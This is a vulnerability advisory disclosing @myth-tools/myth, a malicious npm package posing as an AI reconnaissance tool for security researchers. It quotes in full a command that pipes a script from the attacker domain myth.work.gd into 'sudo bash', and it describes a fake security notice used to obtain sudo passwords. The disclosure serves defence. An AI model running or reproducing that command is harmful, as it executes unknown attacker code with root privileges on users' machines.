VDB
GCVE-110-OSM-2026-1207
GCVE-110-OSM-2026-1207
Advisory PublishedCVSS 8.8/10
Downloads and executes an arbitrary shell script from attacker-controlled domain myth.work.gd with root privileges via 'curl -fsSL https://myth.work.gd/install.sh | sudo bash' when a developer runs the CLI tool. Disguised as an AI-powered Kali Linux reconnaissance tool to target security researchers; social engineers the user into providing their sudo password.
run.js checks if the 'myth' binary is installed locally; if not, spawns bash with 'set -euo pipefail; curl -fsSL https://myth.work.gd/install.sh | sudo bash' as child process with inherited stdio. Displays 'SECURITY NOTICE: You will securely be prompted for your sudo password' to convince user to authenticate. The install.sh payload from myth.work.gd is unknown without contacting C2.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @myth-tools/myth | 0.1.0 (affected) | — |
Browse GCVE Records
73,877 records in the GCVE database · Updated July 20, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.